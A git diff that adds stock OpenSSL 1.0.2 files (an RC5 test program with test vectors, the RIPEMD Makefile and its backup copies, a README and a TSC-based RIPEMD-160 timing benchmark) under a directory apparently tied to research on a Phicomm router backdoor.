+    {0x21, 0xA5, 0xDB, 0xEE, 0x15, 0x4B, 0x8F, 0x6D},
+    {0xF7, 0xC0, 0x13, 0xAC, 0x5B, 0x2B, 0x89, 0x52},
+    {0x2F, 0x42, 0xB3, 0xB7, 0x03, 0x69, 0xFC, 0x92},
+    {0x65, 0xC1, 0x78, 0xB2, 0x84, 0xD1, 0x97, 0xCC},
+    {0xEB, 0x44, 0xE4, 0x15, 0xDA, 0x31, 0x98, 0x24},
+};
+
+# define RC5_CBC_NUM 27
+static unsigned char rc5_cbc_cipher[RC5_CBC_NUM][8] = {
+    {0x7a, 0x7b, 0xba, 0x4d, 0x79, 0x11, 0x1d, 0x1e},
+    {0x79, 0x7b, 0xba, 0x4d, 0x78, 0x11, 0x1d, 0x1e},
+    {0x7a, 0x7b, 0xba, 0x4d, 0x79, 0x11, 0x1d, 0x1f},
+    {0x7a, 0x7b, 0xba, 0x4d, 0x79, 0x11, 0x1d, 0x1f},
+    {0x8b, 0x9d, 0xed, 0x91, 0xce, 0x77, 0x94, 0xa6},
+    {0x2f, 0x75, 0x9f, 0xe7, 0xad, 0x86, 0xa3, 0x78},
+    {0xdc, 0xa2, 0x69, 0x4b, 0xf4, 0x0e, 0x07, 0x88},
+    {0xdc, 0xa2, 0x69, 0x4b, 0xf4, 0x0e, 0x07, 0x88},
+    {0xdc, 0xfe, 0x09, 0x85, 0x77, 0xec, 0xa5, 0xff},
+    {0x96, 0x46, 0xfb, 0x77, 0x63, 0x8f, 0x9c, 0xa8},
+    {0xb2, 0xb3, 0x20, 0x9d, 0xb6, 0x59, 0x4d, 0xa4},
+    {0x54, 0x5f, 0x7f, 0x32, 0xa5, 0xfc, 0x38, 0x36},
+    {0x82, 0x85, 0xe7, 0xc1, 0xb5, 0xbc, 0x74, 0x02},
+    {0xfc, 0x58, 0x6f, 0x92, 0xf7, 0x08, 0x09, 0x34},
+    {0xcf, 0x27, 0x0e, 0xf9, 0x71, 0x7f, 0xf7, 0xc4},
+    {0xe4, 0x93, 0xf1, 0xc1, 0xbb, 0x4d, 0x6e, 0x8c},
+    {0x5c, 0x4c, 0x04, 0x1e, 0x0f, 0x21, 0x7a, 0xc3},
+    {0x92, 0x1f, 0x12, 0x48, 0x53, 0x73, 0xb4, 0xf7},
+    {0x5b, 0xa0, 0xca, 0x6b, 0xbe, 0x7f, 0x5f, 0xad},
+    {0xc5, 0x33, 0x77, 0x1c, 0xd0, 0x11, 0x0e, 0x63},
+    {0x29, 0x4d, 0xdb, 0x46, 0xb3, 0x27, 0x8d, 0x60},
+    {0xda, 0xd6, 0xbd, 0xa9, 0xdf, 0xe8, 0xf7, 0xe8},
+    {0x97, 0xe0, 0x78, 0x78, 0x37, 0xed, 0x31, 0x7f},
+    {0x78, 0x75, 0xdb, 0xf6, 0x73, 0x8c, 0x64, 0x78},
+    {0x8f, 0x34, 0xc3, 0xc6, 0x81, 0xc9, 0x96, 0x95},
+    {0x7c, 0xb3, 0xf1, 0xdf, 0x34, 0xf9, 0x48, 0x11},
+    {0x7f, 0xd1, 0xa0, 0x23, 0xa5, 0xbb, 0xa2, 0x17},
+};
+
+static unsigned char rc5_cbc_key[RC5_CBC_NUM][17] = {
+    {1, 0x00},
+    {1, 0x00},
+    {1, 0x00},
+    {1, 0x00},
+    {1, 0x00},
+    {1, 0x11},
+    {1, 0x00},
+    {4, 0x00, 0x00, 0x00, 0x00},
+    {1, 0x00},
+    {1, 0x00},
+    {1, 0x00},
+    {1, 0x00},
+    {4, 0x01, 0x02, 0x03, 0x04},
+    {4, 0x01, 0x02, 0x03, 0x04},
+    {4, 0x01, 0x02, 0x03, 0x04},
+    {8, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {8, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {8, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {8, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {16, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
+     0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {16, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
+     0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {16, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
+     0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {5, 0x01, 0x02, 0x03, 0x04, 0x05},
+    {5, 0x01, 0x02, 0x03, 0x04, 0x05},
+    {5, 0x01, 0x02, 0x03, 0x04, 0x05},
+    {5, 0x01, 0x02, 0x03, 0x04, 0x05},
+    {5, 0x01, 0x02, 0x03, 0x04, 0x05},
+};
+
+static unsigned char rc5_cbc_plain[RC5_CBC_NUM][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0x10, 0x20, 0x30, 0x40, 0x50, 0x60, 0x70, 0x80},
+    {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
+    {0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x01},
+};
+
+static int rc5_cbc_rounds[RC5_CBC_NUM] = {
+    0, 0, 0, 0, 0, 1, 2, 2,
+    8, 8, 12, 16, 8, 12, 16, 12,
+    8, 12, 16, 8, 12, 16, 12, 8,
+    8, 8, 8,
+};
+
+static unsigned char rc5_cbc_iv[RC5_CBC_NUM][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x78, 0x75, 0xdb, 0xf6, 0x73, 0x8c, 0x64, 0x78},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x7c, 0xb3, 0xf1, 0xdf, 0x34, 0xf9, 0x48, 0x11},
+};
+
+int main(int argc, char *argv[])
+{
+    int i, n, err = 0;
+    RC5_32_KEY key;
+    unsigned char buf[8], buf2[8], ivb[8];
+
+    for (n = 0; n < 5; n++) {
+        RC5_32_set_key(&key, 16, &(RC5key[n][0]), 12);
+
+        RC5_32_ecb_encrypt(&(RC5plain[n][0]), buf, &key, RC5_ENCRYPT);
+        if (memcmp(&(RC5cipher[n][0]), buf, 8) != 0) {
+            printf("ecb RC5 error encrypting (%d)\n", n + 1);
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", buf[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", RC5cipher[n][i]);
+            err = 20;
+            printf("\n");
+        }
+
+        RC5_32_ecb_encrypt(buf, buf2, &key, RC5_DECRYPT);
+        if (memcmp(&(RC5plain[n][0]), buf2, 8) != 0) {
+            printf("ecb RC5 error decrypting (%d)\n", n + 1);
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", buf2[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", RC5plain[n][i]);
+            printf("\n");
+            err = 3;
+        }
+    }
+    if (err == 0)
+        printf("ecb RC5 ok\n");
+
+    for (n = 0; n < RC5_CBC_NUM; n++) {
+        i = rc5_cbc_rounds[n];
+        if (i < 8)
+            continue;
+
+        RC5_32_set_key(&key, rc5_cbc_key[n][0], &(rc5_cbc_key[n][1]), i);
+
+        memcpy(ivb, &(rc5_cbc_iv[n][0]), 8);
+        RC5_32_cbc_encrypt(&(rc5_cbc_plain[n][0]), buf, 8,
+                           &key, &(ivb[0]), RC5_ENCRYPT);
+
+        if (memcmp(&(rc5_cbc_cipher[n][0]), buf, 8) != 0) {
+            printf("cbc RC5 error encrypting (%d)\n", n + 1);
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", buf[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", rc5_cbc_cipher[n][i]);
+            err = 30;
+            printf("\n");
+        }
+
+        memcpy(ivb, &(rc5_cbc_iv[n][0]), 8);
+        RC5_32_cbc_encrypt(buf, buf2, 8, &key, &(ivb[0]), RC5_DECRYPT);
+        if (memcmp(&(rc5_cbc_plain[n][0]), buf2, 8) != 0) {
+            printf("cbc RC5 error decrypting (%d)\n", n + 1);
+            printf("got     :");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", buf2[i]);
+            printf("\n");
+            printf("expected:");
+            for (i = 0; i < 8; i++)
+                printf("%02X ", rc5_cbc_plain[n][i]);
+            printf("\n");
+            err = 3;
+        }
+    }
+    if (err == 0)
+        printf("cbc RC5 ok\n");
+
+    EXIT(err);
+    return (err);
+}
+
+# ifdef undef
+static int cfb64_test(unsigned char *cfb_cipher)
+{
+    IDEA_KEY_SCHEDULE eks, dks;
+    int err = 0, i, n;
+
+    idea_set_encrypt_key(cfb_key, &eks);
+    idea_set_decrypt_key(&eks, &dks);
+    memcpy(cfb_tmp, cfb_iv, 8);
+    n = 0;
+    idea_cfb64_encrypt(plain, cfb_buf1, (long)12, &eks,
+                       cfb_tmp, &n, IDEA_ENCRYPT);
+    idea_cfb64_encrypt(&(plain[12]), &(cfb_buf1[12]),
+                       (long)CFB_TEST_SIZE - 12, &eks,
+                       cfb_tmp, &n, IDEA_ENCRYPT);
+    if (memcmp(cfb_cipher, cfb_buf1, CFB_TEST_SIZE) != 0) {
+        err = 1;
+        printf("idea_cfb64_encrypt encrypt error\n");
+        for (i = 0; i < CFB_TEST_SIZE; i += 8)
+            printf("%s\n", pt(&(cfb_buf1[i])));
+    }
+    memcpy(cfb_tmp, cfb_iv, 8);
+    n = 0;
+    idea_cfb64_encrypt(cfb_buf1, cfb_buf2, (long)17, &eks,
+                       cfb_tmp, &n, IDEA_DECRYPT);
+    idea_cfb64_encrypt(&(cfb_buf1[17]), &(cfb_buf2[17]),
+                       (long)CFB_TEST_SIZE - 17, &dks,
+                       cfb_tmp, &n, IDEA_DECRYPT);
+    if (memcmp(plain, cfb_buf2, CFB_TEST_SIZE) != 0) {
+        err = 1;
+        printf("idea_cfb_encrypt decrypt error\n");
+        for (i = 0; i < 24; i += 8)
+            printf("%s\n", pt(&(cfb_buf2[i])));
+    }
+    return (err);
+}
+
+static char *pt(unsigned char *p)
+{
+    static char bufs[10][20];
+    static int bnum = 0;
+    char *ret;
+    int i;
+    static char *f = "0123456789ABCDEF";
+
+    ret = &(bufs[bnum++][0]);
+    bnum %= 10;
+    for (i = 0; i < 8; i++) {
+        ret[i * 2] = f[(p[i] >> 4) & 0xf];
+        ret[i * 2 + 1] = f[p[i] & 0xf];
+    }
+    ret[16] = '\0';
+    return (ret);
+}
+
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile
new file mode 100644
index 0000000..25140b2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile
@@ -0,0 +1,95 @@
+#
+# OpenSSL/crypto/ripemd/Makefile
+#
+
+DIR=    ripemd
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+RIP_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=rmdtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rmd_dgst.c rmd_one.c
+LIBOBJ=rmd_dgst.o rmd_one.o $(RMD160_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ripemd.h
+HEADER= rmd_locl.h rmdconst.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+rmd-586.s:	asm/rmd-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/rmd-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rmd_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rmd_dgst.o: ../../include/openssl/opensslconf.h
+rmd_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rmd_dgst.o: ../../include/openssl/ripemd.h ../../include/openssl/safestack.h
+rmd_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rmd_dgst.o: ../md32_common.h rmd_dgst.c rmd_locl.h rmdconst.h
+rmd_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rmd_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rmd_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/ripemd.h
+rmd_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rmd_one.o: ../../include/openssl/symhacks.h rmd_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.bak
new file mode 100644
index 0000000..25140b2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.bak
@@ -0,0 +1,95 @@
+#
+# OpenSSL/crypto/ripemd/Makefile
+#
+
+DIR=    ripemd
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+RIP_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=rmdtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rmd_dgst.c rmd_one.c
+LIBOBJ=rmd_dgst.o rmd_one.o $(RMD160_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ripemd.h
+HEADER= rmd_locl.h rmdconst.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+rmd-586.s:	asm/rmd-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/rmd-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rmd_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rmd_dgst.o: ../../include/openssl/opensslconf.h
+rmd_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rmd_dgst.o: ../../include/openssl/ripemd.h ../../include/openssl/safestack.h
+rmd_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rmd_dgst.o: ../md32_common.h rmd_dgst.c rmd_locl.h rmdconst.h
+rmd_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rmd_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rmd_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/ripemd.h
+rmd_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rmd_one.o: ../../include/openssl/symhacks.h rmd_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.save
new file mode 100644
index 0000000..25140b2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/Makefile.save
@@ -0,0 +1,95 @@
+#
+# OpenSSL/crypto/ripemd/Makefile
+#
+
+DIR=    ripemd
+TOP=    ../..
+CC=     cc
+CPP=    $(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=       Makefile
+AR=             ar r
+
+RIP_ASM_OBJ=
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=rmdtest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rmd_dgst.c rmd_one.c
+LIBOBJ=rmd_dgst.o rmd_one.o $(RMD160_ASM_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= ripemd.h
+HEADER= rmd_locl.h rmdconst.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:    lib
+
+lib:    $(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+rmd-586.s:	asm/rmd-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/rmd-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rmd_dgst.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rmd_dgst.o: ../../include/openssl/opensslconf.h
+rmd_dgst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+rmd_dgst.o: ../../include/openssl/ripemd.h ../../include/openssl/safestack.h
+rmd_dgst.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rmd_dgst.o: ../md32_common.h rmd_dgst.c rmd_locl.h rmdconst.h
+rmd_one.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+rmd_one.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rmd_one.o: ../../include/openssl/ossl_typ.h ../../include/openssl/ripemd.h
+rmd_one.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rmd_one.o: ../../include/openssl/symhacks.h rmd_one.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/README
new file mode 100644
index 0000000..f1ffc8b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/README
@@ -0,0 +1,15 @@
+RIPEMD-160
+http://www.esat.kuleuven.ac.be/~bosselae/ripemd160.html
+
+This is my implementation of RIPEMD-160.  The pentium assember is a little
+off the pace since I only get 1050 cycles, while the best is 1013.
+I have a few ideas for how to get another 20 or so cycles, but at
+this point I will not bother right now.  I believe the trick will be
+to remove my 'copy X array onto stack' until inside the RIP1() finctions the
+first time round.  To do this I need another register and will only have one
+temporary one.  A bit tricky....  I can also cleanup the saving of the 5 words
+after the first half of the calculation.  I should read the origional
+value, add then write.  Currently I just save the new and read the origioal.
+I then read both at the end.  Bad.
+
+eric (20-Jan-1998)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rips.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rips.cpp
new file mode 100644
index 0000000..f7a1367
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rips.cpp
@@ -0,0 +1,82 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/ripemd.h>
+
+#define ripemd160_block_x86 ripemd160_block_asm_host_order
+
+extern "C" {
+void ripemd160_block_x86(RIPEMD160_CTX *ctx, unsigned char *buffer,int num);
+}
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[64*256];
+	RIPEMD160_CTX ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=0,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=16;
+	if (num > 250) num=16;
+	numm=num+2;
+#if 0
+	num*=64;
+	numm*=64;
+#endif
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			ripemd160_block_x86(&ctx,buffer,numm);
+			GetTSC(s1);
+			ripemd160_block_x86(&ctx,buffer,numm);
+			GetTSC(e1);
+			GetTSC(s2);
+			ripemd160_block_x86(&ctx,buffer,num);
+			GetTSC(e2);
+			ripemd160_block_x86(&ctx,buffer,num);
+			}
+		printf("ripemd160 (%d bytes) %d %d (%.2f)\n",num*64,
+			e1-s1,e2-s2,(double)((e1-s1)-(e2-s2))/2);
+		}
+	}
+
